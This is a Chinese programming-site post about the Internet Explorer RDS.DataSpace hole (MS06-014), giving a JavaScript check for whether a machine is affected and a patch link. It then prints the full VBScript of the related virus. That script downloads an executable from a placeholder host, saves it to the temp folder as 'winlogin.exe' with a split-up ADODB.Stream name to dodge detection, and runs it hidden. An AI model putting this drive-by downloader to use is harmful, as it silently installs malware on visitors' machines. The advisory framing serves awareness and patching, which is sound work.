您的位置:首页 > 编程语言 > ASP

【最新漏洞】IE中使用Rds.DataSpace下载并运行病毒文件

2007-02-23 00:00 706 查看
请执行下面的代码测试您的机器是否存在漏洞:


try
{
var Dts = new ActiveXObject("RDS.DataSpace");
var Stm = Dts.CreateObject("Microsoft.XmlHttp","");
alert("您的机器存在漏洞,请及时打上补丁。");
}
catch(err)
{
alert("您的机器不存在该漏洞:" + err.message);
}
[Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]
补丁下载:http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx
相关病毒的vbs代码如下:
on error resume next 
dl = "http://www.xxx.com/xxx.exe" 
Set df = document.createElement("object") 
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" 
str="Microsoft.XMLHTTP" 
Set x = df.CreateObject(str,"") 
a1="Ado" 
a2="db." 
a3="Str" 
a4="eam" 
str1=a1&a2&a3&a4 
str5=str1 
set S = df.createobject(str5,"") 
S.type = 1 
str6="GET" 
x.Open str6, dl, False 
x.Send 
fname1="winlogin.exe" 
set F = df.createobject("Scripting.FileSystemObject","") 
set tmp = F.GetSpecialFolder(2)  
fname1= F.BuildPath(tmp,fname1) 
S.open 
S.write x.responseBody 
S.savetofile fname1,2 
S.close 
set Q = df.createobject("Shell.Application","") 
Q.ShellExecute fname1,"","","open",0
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐